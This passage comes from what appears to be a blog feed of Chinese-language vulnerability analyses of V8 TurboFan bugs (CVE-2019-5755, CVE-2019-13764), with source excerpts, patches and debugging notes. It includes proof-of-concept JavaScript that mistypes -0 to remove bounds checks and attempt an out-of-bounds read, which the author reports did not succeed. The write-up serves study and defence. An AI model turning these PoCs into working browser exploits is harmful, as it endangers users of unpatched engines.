class="built_in">GetType</span>(node),</span><br><span class="line">                NodeProperties::<span class="built_in">GetType</span>(replacement), <span class="built_in">graph</span>()-&gt;<span class="built_in">zone</span>());</span><br><span class="line">            <span class="comment">// 建立新结点</span></span><br><span class="line">            replacement = effect =</span><br><span class="line">                <span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(<span class="built_in">common</span>()-&gt;<span class="built_in">TypeGuard</span>(replacement_type),</span><br><span class="line">                                 replacement, effect, control);</span><br><span class="line">            <span class="comment">// type 设置</span></span><br><span class="line">            NodeProperties::<span class="built_in">SetType</span>(replacement, replacement_type);</span><br><span class="line">          &#125;</span><br><span class="line">          <span class="comment">// 结点替换</span></span><br><span class="line">          <span class="built_in">ReplaceWithValue</span>(node, replacement, effect);</span><br><span class="line">          <span class="keyword">return</span> <span class="built_in">Replace</span>(replacement);</span><br><span class="line">        &#125;</span><br><span class="line">      &#125;</span><br><span class="line">      state = state-&gt;<span class="built_in">AddField</span>(object, field_index, node, access.name, <span class="built_in">zone</span>());</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">UpdateState</span>(node, state);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但 LoadEliminationPhase 中存在 ConstantFoldingReducer，因此最终 SameValue 结点还是会被替换成 HeapConstant。所以我们还是必须想办法绕过 LoadElimination 的优化，进入 EscapeAnalysis 中的优化。</p><p>折腾了相当长的时间，终于找到了绕过的方法，以下是修改后的 PoC，与之前相比，加了一行略微奇怪的 console.log 函数调用：</p><blockquote><p>这个绕过方法是蒙出来的，把代码改复杂一点有时可以非常玄学的绕过某些优化。</p></blockquote><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> obj = &#123; <span class="attr">a</span>: -<span class="number">0</span> &#125;; <span class="comment">// Escape Analysis 特供1</span></span><br><span class="line">    <span class="keyword">let</span> wrongNum = (trigger ? -<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(obj.<span class="property">a</span> = -<span class="number">0</span> );     <span class="comment">// 绕过 LoadElimination 特供</span></span><br><span class="line">    <span class="keyword">let</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>(wrongNum, obj.<span class="property">a</span>);</span><br><span class="line">    <span class="keyword">return</span> idx + <span class="number">1</span>;</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Escape Analysis 特供2</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">2</span>; a++)</span><br><span class="line">    <span class="title function_">foo</span>(<span class="literal">false</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); <span class="comment">// expected: true, got: false</span></span><br></pre></td></tr></table></figure><p>因此我们便可以绕过LoadElimination：</p><p><img src="/2021/02/CVE-2019-5755/loadelimination.png" alt="img"></p><p>在 EscapeAnalysisPhase 完成之后，彻底完成所有的基础工作：</p><p><img src="/2021/02/CVE-2019-5755/escape_analysis_show1.png" alt="img"></p><p>之后笔者稍微修改了一下代码，添加上数组访问操作，看看能否成功优化 checkbounds 结点（原先的代码只是获取索引值）：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">foo</span>(<span class="params">trigger</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> arr = [<span class="number">0.1</span>, <span class="number">0.2</span>, <span class="number">0.3</span>, <span class="number">0.4</span>];</span><br><span class="line">    <span class="keyword">let</span> obj = &#123; <span class="attr">a</span>: -<span class="number">0</span> &#125;; <span class="comment">// Escape Analysis 特供1</span></span><br><span class="line">    <span class="keyword">let</span> wrongNum = (trigger ? -<span class="number">0</span> : <span class="number">0</span>) - <span class="number">0</span>;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(obj.<span class="property">a</span>);     <span class="comment">// 绕过 LoadElimination 的特供语句</span></span><br><span class="line">    <span class="keyword">let</span> idx = <span class="title class_">Object</span>.<span class="title function_">is</span>(wrongNum, obj.<span class="property">a</span>);</span><br><span class="line">    <span class="keyword">return</span> arr[idx * <span class="number">1337</span>]; <span class="comment">// 试着越界</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// Escape Analysis 特供2</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">2</span>; a++)</span><br><span class="line">    <span class="title function_">foo</span>(<span class="literal">false</span>);</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(foo);</span><br><span class="line"><span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="title function_">foo</span>(<span class="literal">true</span>)); </span><br></pre></td></tr></table></figure><p>观察 turbolizer，可以发现 checkbounds 结点被成功优化：</p><p><img src="/2021/02/CVE-2019-5755/elimate_checkbounds.png" alt="img"></p><p>编译生成的汇编代码貌似也没什么问题：</p><blockquote><p>Builtin_SameValue 的函数调用规范：%rdx 和 %rax 分别为左右两个操作数。</p></blockquote><p><img src="/2021/02/CVE-2019-5755/exp_asm.png" alt="img"></p><p>看上去应该可以成功越界读取，但实际执行时发现读取出的仍然是索引值为0的数组元素（心态崩了TAT）。</p><p>笔者动态调试了一下编译后 JS 函数的汇编代码，发现变量 wrongNum <strong>被截断成整型</strong>，之后与 0x1 进行比较：</p><blockquote><p>使用 <code>--trace-turbo</code> 参数 结合 turbolizer ，即时查看编译后函数的内存地址；同时搭配内置函数 <code>%SystemDebug()</code>，便于调试。</p></blockquote><p><img src="/2021/02/CVE-2019-5755/problem_asm1.png" alt="img"></p><p>而这实际上是 ChangeInt31ToTaggedSigned 结点的锅：</p><p><img src="/2021/02/CVE-2019-5755/insertNode.png" alt="img"></p><p>由于这个 ChangeInt31ToTaggedSigned 结点在 Simplified Lowering 阶段中生成，不可优化，因此 exp 编写就没办法继续下去，只能就此终止。</p><h2 id="五、后记">五、后记</h2><ul><li><p>该漏洞补丁的详细信息请查阅<a href="https://chromium.googlesource.com/v8/v8.git/+/e3c923962677908c183121644c945777cdb31570">此处</a></p><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Type OperationTyper::SpeculativeSafeIntegerSubtract(Type lhs, Type rhs) &#123;</span><br><span class="line">  Type result = SpeculativeNumberSubtract(lhs, rhs);</span><br><span class="line">  // If we have a Smi or Int32 feedback, the representation selection will</span><br><span class="line">  // either truncate or it will check the inputs (i.e., deopt if not int32).</span><br><span class="line">  // In either case the result will be in the safe integer range, so we</span><br><span class="line">  // can bake in the type here. This needs to be in sync with</span><br><span class="line">  // SimplifiedLowering::VisitSpeculativeAdditiveOp.</span><br><span class="line"><span class="deletion">-  return result = Type::Intersect(result, cache_.kSafeInteger, zone());</span></span><br><span class="line"><span class="addition">+  return Type::Intersect(result, cache_.kSafeIntegerOrMinusZero, zone());</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">void VisitSpeculativeIntegerAdditiveOp(Node* node, Truncation truncation,</span><br><span class="line">                                         SimplifiedLowering* lowering) &#123;</span><br><span class="line">   // ...</span><br><span class="line">   </span><br><span class="line">   Type left_feedback_type = TypeOf(node-&gt;InputAt(0));</span><br><span class="line">     Type right_feedback_type = TypeOf(node-&gt;InputAt(1));</span><br><span class="line">     // Handle the case when no int32 checks on inputs are necessary (but</span><br><span class="line">     // an overflow check is needed on the output). Note that we do not</span><br><span class="line"><span class="deletion">-    // have to do any check if at most one side can be minus zero.</span></span><br><span class="line"><span class="deletion">-    if (left_upper.Is(Type::Signed32OrMinusZero()) &amp;&amp;</span></span><br><span class="line"><span class="addition">+    // have to do any check if at most one side can be minus zero. For</span></span><br><span class="line"><span class="addition">+    // subtraction we need to handle the case of -0 - 0 properly, since</span></span><br><span class="line"><span class="addition">+    // that can produce -0.</span></span><br><span class="line"><span class="addition">+    Type left_constraint_type =</span></span><br><span class="line"><span class="addition">+        node-&gt;opcode() == IrOpcode::kSpeculativeSafeIntegerAdd</span></span><br><span class="line"><span class="addition">+            ? Type::Signed32OrMinusZero()</span></span><br><span class="line"><span class="addition">+            : Type::Signed32();</span></span><br><span class="line"><span class="addition">+    if (left_upper.Is(left_constraint_type) &amp;&amp;</span></span><br><span class="line">         right_upper.Is(Type::Signed32OrMinusZero()) &amp;&amp;</span><br><span class="line">         (left_upper.Is(Type::Signed32()) || right_upper.Is(Type::Signed32()))) &#123;</span><br><span class="line">       VisitBinop(node, UseInfo::TruncatingWord32(),</span><br><span class="line">                 MachineRepresentation::kWord32, Type::Signed32());</span><br><span class="line">     &#125; else &#123;</span><br><span class="line">     // ...</span><br><span class="line">     &#125;</span><br><span class="line">     // ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>漏洞修复后，原先 Poc 执行的 turbolizer 视图如下：</p><p><img src="/2021/02/CVE-2019-5755/patched_turbolizer.png" alt="img"></p><p>可以看到，SpeculativeSafeIntegerSubtra 的 Type 包含了 MinusZero 这种类型，因此下面的 SameValue 的类型也不再固定为 false， 而是<strong>不确定</strong>的 Boolean。</p></li></ul><h2 id="六、参考">六、参考</h2><ul><li><a href="https://bugs.chromium.org/p/chromium/issues/detail?id=913296">Issue 913296: Security: V8: Incorrect type information on SpeculativeSafeIntegerSubtract</a></li><li><a href="https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/">Exploiting the Math.expm1 typing bug in V8 - 0x41414141 in ??()</a></li><li><a href="https://www.jfokus.se/jfokus18/preso/Escape-Analysis-in-V8.pdf">Escape-Analysis-in-V8</a></li><li><a href="https://cy2cs.top/2020/05/07/v8-math-expm1-%e7%b1%bb%e5%9e%8b%e9%94%99%e8%af%af%e5%af%bc%e8%87%b4%e7%9a%84%e6%bc%8f%e6%b4%9e/">v8-math-expm1-类型错误导致的漏洞</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、前言&quot;&gt;一、前言&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;CVE-2019-5755 是一个位于 v8 turboFan 的类型信息缺失漏洞。该漏洞将导致 SpeculativeSafeIntegerSubtract 的计算结果缺失 MinusZero （即 -0）这种类型。这将允许 turboFan 计算出错误的 Range 并可进一步构造出越界读写原语，乃至执行 shellcode。&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;复现用的 v8 版本为 &lt;code&gt;7.1.302.28&lt;/code&gt; （或者commit ID &lt;code&gt;a62e9dd69957d9b1d0a56f825506408960a283fc&lt;/code&gt; 前的版本也可）&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="vulnerability analysis" scheme="https://kiprey.github.io/categories/vulnerability-analysis/"/>
    
    <category term="v8" scheme="https://kiprey.github.io/categories/vulnerability-analysis/v8/"/>
    
    
    <category term="v8" scheme="https://kiprey.github.io/tags/v8/"/>
    
  </entry>
  
  <entry>
    <title>CVE-2019-13764 分析</title>
    <link href="https://kiprey.github.io/2021/02/CVE-2019-13764/"/>
    <id>https://kiprey.github.io/2021/02/CVE-2019-13764/</id>
    <published>2021-02-10T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.750Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、前言">一、前言</h2><ul><li><p>CVE-2019-13764 是 v8 中的一个位于  JIT TyperPhase  <code>TypeInductionVariablePhi</code> 函数的漏洞。我们可以通过这个例子简单学习一下 TyperPhase 中对 InductionVariablePhi 的处理方式，以及越界读取构造方式。</p></li><li><p>复现用的 v8 版本为 <code>7.8.279.23</code>（chromium 78.0.3904.108） 。</p></li></ul><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><ul><li><p>切换 v8 版本，然后编译：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">git checkout 7.8.279.23</span><br><span class="line">gclient <span class="built_in">sync</span></span><br><span class="line">tools/dev/v8gen.py x64.debug</span><br><span class="line">ninja -C out.gn/x64.debug  </span><br></pre></td></tr></table></figure></li><li><p>启动 turbolizer。如果原先版本的 turbolizer 无法使用，则可以使用在线版本的 <a href="https://v8.github.io/tools/head/turbolizer/index.html">turbolizer</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> tools/turbolizer</span><br><span class="line">npm i</span><br><span class="line">npm run-script build</span><br><span class="line">python -m SimpleHTTPServer 8000&amp;</span><br><span class="line">google-chrome http://127.0.0.1:8000</span><br></pre></td></tr></table></figure></li></ul><h2 id="三、漏洞细节">三、漏洞细节</h2><ul><li><p>在循环变量分析中，当initial_type 与 increment_type 相结合，则可以通过两个不同符号的无穷大相加产生NaN结果（即 <strong>-inf + inf == NaN</strong>）。这将<strong>进入 turboFan 认为是 unreachable code 的代码区域</strong>，触发 SIGTRAP 崩溃。</p></li><li><p>以下是漏洞函数的源码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeInductionVariablePhi</span>(Node* node) &#123;</span><br><span class="line">  <span class="type">int</span> arity = NodeProperties::<span class="built_in">GetControlInput</span>(node)-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">ControlInputCount</span>();</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(IrOpcode::kLoop, NodeProperties::<span class="built_in">GetControlInput</span>(node)-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">  <span class="built_in">DCHECK_EQ</span>(<span class="number">2</span>, NodeProperties::<span class="built_in">GetControlInput</span>(node)-&gt;<span class="built_in">InputCount</span>());</span><br><span class="line"></span><br><span class="line">  Type initial_type = <span class="built_in">Operand</span>(node, <span class="number">0</span>);</span><br><span class="line">  Type increment_type = <span class="built_in">Operand</span>(node, <span class="number">2</span>);</span><br><span class="line"></span><br><span class="line">  <span class="comment">// We only handle integer induction variables (otherwise ranges</span></span><br><span class="line">  <span class="comment">// do not apply and we cannot do anything).</span></span><br><span class="line">  <span class="comment">// 检测 intial_type &amp;&amp; increment_type 是否都是 integer 类型</span></span><br><span class="line">  <span class="keyword">if</span> (!initial_type.<span class="built_in">Is</span>(typer_-&gt;cache_-&gt;kInteger) ||</span><br><span class="line">      !increment_type.<span class="built_in">Is</span>(typer_-&gt;cache_-&gt;kInteger)) &#123;</span><br><span class="line">    <span class="comment">// Fallback to normal phi typing, but ensure monotonicity.</span></span><br><span class="line">    <span class="comment">// (Unfortunately, without baking in the previous type, monotonicity might</span></span><br><span class="line">    <span class="comment">// be violated because we might not yet have retyped the incrementing</span></span><br><span class="line">    <span class="comment">// operation even though the increment&#x27;s type might been already reflected</span></span><br><span class="line">    <span class="comment">// in the induction variable phi.)</span></span><br><span class="line">    <span class="comment">// 如果不满足条件，则回退至保守的 phi typer。</span></span><br><span class="line">    Type type = NodeProperties::<span class="built_in">IsTyped</span>(node) ? NodeProperties::<span class="built_in">GetType</span>(node)</span><br><span class="line">                                              : Type::<span class="built_in">None</span>();</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; arity; ++i) &#123;</span><br><span class="line">      type = Type::<span class="built_in">Union</span>(type, <span class="built_in">Operand</span>(node, i), <span class="built_in">zone</span>());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> type;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Now process the bounds.</span></span><br><span class="line">  <span class="comment">// 开始处理 bounds，获取最终的 min 和 max 值。</span></span><br><span class="line">  <span class="keyword">auto</span> res = induction_vars_-&gt;<span class="built_in">induction_variables</span>().<span class="built_in">find</span>(node-&gt;<span class="built_in">id</span>());</span><br><span class="line">  <span class="built_in">DCHECK</span>(res != induction_vars_-&gt;<span class="built_in">induction_variables</span>().<span class="built_in">end</span>());</span><br><span class="line">  InductionVariable* induction_var = res-&gt;second;</span><br><span class="line"></span><br><span class="line">  InductionVariable::ArithmeticType arithmetic_type = induction_var-&gt;<span class="built_in">Type</span>();</span><br><span class="line">    </span><br><span class="line">  <span class="type">double</span> min = -V8_INFINITY;</span><br><span class="line">  <span class="type">double</span> max = V8_INFINITY;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* 获取实际的 min 和 max。</span></span><br><span class="line"><span class="comment">     其中</span></span><br><span class="line"><span class="comment">     1. 对于循环是增量的情况（即increment_min &gt;= 0）：</span></span><br><span class="line"><span class="comment">      - min = initial_type.Min();</span></span><br><span class="line"><span class="comment">      - max = std::min(max, bound_max + increment_max);</span></span><br><span class="line"><span class="comment">        max = std::max(max, initial_type.Max());   </span></span><br><span class="line"><span class="comment">     2. 对于循环是减量的情况（即increment_max &lt;= 0）：</span></span><br><span class="line"><span class="comment">      - max = initial_type.Max();</span></span><br><span class="line"><span class="comment">      - min = std::max(min, bound_min + increment_min);</span></span><br><span class="line"><span class="comment">        min = std::min(min, initial_type.Min());</span></span><br><span class="line"><span class="comment">   */</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Range</span>(min, max, typer_-&gt;<span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>上述源码只是简单的判断了一下 initial_type 和 increment_type 的类型是否全为 Integer，如果不满足条件则使用保守的 typer；但这其中并没有判断出现 NaN 的情况，因此针对于某些 testcase 会产生问题。</p></li><li><p>当 initial value 为 <strong>infinity</strong>， increment value 为 <strong>-infinity</strong>，即类似于以下这种形式的循环：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="title class_">Infinity</span>, a &gt;= <span class="number">1</span>; a += (-<span class="title class_">Infinity</span>)) &#123;&#125;</span><br></pre></td></tr></table></figure><p>则在处理归纳变量 i 的phi结点时，由于 inital_type 和 increment_type 都是 integer 类型的，因此将不会回退至保守typer计算 type，而是继续向下执行。那么将会以下述过程执行至 return 语句，返回一个 <code>-inf ~ inf</code>的范围给当前的 InductionVariablePhi 结点：</p><blockquote><p>具体的细节均以注释的形式写入代码中。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">Type Typer::Visitor::<span class="built_in">TypeInductionVariablePhi</span>(Node* node) &#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// [1]. 初始时设置 min 值和 max 值为两个极端</span></span><br><span class="line">  <span class="type">double</span> min = -V8_INFINITY;</span><br><span class="line">  <span class="type">double</span> max = V8_INFINITY;</span><br><span class="line">  <span class="type">double</span> increment_min;</span><br><span class="line">  <span class="type">double</span> increment_max;</span><br><span class="line">  <span class="keyword">if</span> (arithmetic_type == InductionVariable::ArithmeticType::kAddition) &#123;</span><br><span class="line">    <span class="comment">// [2]. 由于 JS 代码中的归纳变量执行的是加法操作，即 `i += (-Infinity)`，因此控制流进入此处</span></span><br><span class="line">    increment_min = increment_type.<span class="built_in">Min</span>();</span><br><span class="line">    increment_max = increment_type.<span class="built_in">Max</span>();</span><br><span class="line">    <span class="comment">// 此时increment_min == increment_max = -inf</span></span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">DCHECK_EQ</span>(InductionVariable::ArithmeticType::kSubtraction, arithmetic_type);</span><br><span class="line">    increment_min = -increment_type.<span class="built_in">Max</span>();</span><br><span class="line">    increment_max = -increment_type.<span class="built_in">Min</span>();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">if</span> (increment_min &gt;= <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (increment_max &lt;= <span class="number">0</span>) </span><br><span class="line">    <span class="comment">// [3]. 由于 increment_max == -inf，因此进入当前分支</span></span><br><span class="line">    <span class="comment">// decreasing sequence</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 获取当前分支的最大值 max，该 max 值将在下面不再更改</span></span><br><span class="line">    <span class="comment">// 此时 max == inf</span></span><br><span class="line">    max = initial_type.<span class="built_in">Max</span>();</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">auto</span> bound : induction_var-&gt;<span class="built_in">lower_bounds</span>()) &#123;</span><br><span class="line">      <span class="comment">// [4]. 对于判断语句中的每个比较操作，即获取 bound类型和值</span></span><br><span class="line">      Type bound_type = <span class="built_in">TypeOrNone</span>(bound.bound);</span><br><span class="line">      <span class="comment">// If the type is not an integer, just skip the bound.</span></span><br><span class="line">      <span class="keyword">if</span> (!bound_type.<span class="built_in">Is</span>(typer_-&gt;cache_-&gt;kInteger)) <span class="keyword">continue</span>;</span><br><span class="line">      <span class="comment">// If the type is not inhabited, then we can take the initial value.</span></span><br><span class="line">      <span class="keyword">if</span> (bound_type.<span class="built_in">IsNone</span>()) &#123;</span><br><span class="line">        min = initial_type.<span class="built_in">Min</span>();</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// 对于上述例子，此时的 bound_min == bound_max = 1</span></span><br><span class="line">      <span class="type">double</span> bound_min = bound_type.<span class="built_in">Min</span>();</span><br><span class="line">      <span class="keyword">if</span> (bound.kind == InductionVariable::kStrict) &#123;</span><br><span class="line">        bound_min += <span class="number">1</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="comment">// 设置min值，由于 max 函数的两个参数都与 -inf 相关，因此设置 min 为 -inf</span></span><br><span class="line">      min = std::<span class="built_in">max</span>(min, bound_min + increment_min);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// The lower bound must be at most the initial value&#x27;s lower bound.</span></span><br><span class="line">    <span class="comment">// [5]. 由于 -inf &lt; inf，因此再次设置 min 值为 -inf</span></span><br><span class="line">    min = std::<span class="built_in">min</span>(min, initial_type.<span class="built_in">Min</span>());</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// Shortcut: If the increment can be both positive and negative,</span></span><br><span class="line">    <span class="comment">// the variable can go arbitrarily far, so just return integer.</span></span><br><span class="line">    <span class="keyword">return</span> typer_-&gt;cache_-&gt;kInteger;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// [6]. 返回 Range(-inf, inf)，即返回了一个错误的范围</span></span><br><span class="line">  <span class="keyword">return</span> Type::<span class="built_in">Range</span>(min, max, typer_-&gt;<span class="built_in">zone</span>());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在 min 值的赋值处（即[4]、[5]），原先的代码预期 <strong>min 值范围为</strong></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">initial_type.Min &lt;= min &lt;= bound_min + increment_type.Min</span><br></pre></td></tr></table></figure><p>但由于 <strong>initial_type.Min == inf；increment_type.Min == -inf</strong>，因此 min 值将沿以下链进行变化：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-<span class="built_in">inf</span>(初始值) =&gt; -<span class="built_in">inf</span>(bound_min+increment_min) =&gt; -<span class="built_in">inf</span>(与initial value比较后的结果)</span><br></pre></td></tr></table></figure><p>这样使得最终的 min 值为 -inf。</p></li><li><p>错误的 Phi 结点的 Range 将导致错误的类型传播。这样会使得控制流非常容易地进入 deopt 环节。该漏洞触发的 int3 断点就是位于编译生成的 JIT 代码中 deopt 环节内部。由于 turboFan 中传播了错误的类型，使得 deopt 无法识别出该调用的 deopt 函数，因此控制流将陷入死循环，频繁触发本不该执行到的 int3 断点。</p><p>以下是 turboFan 第一次编译生成的汇编代码：</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 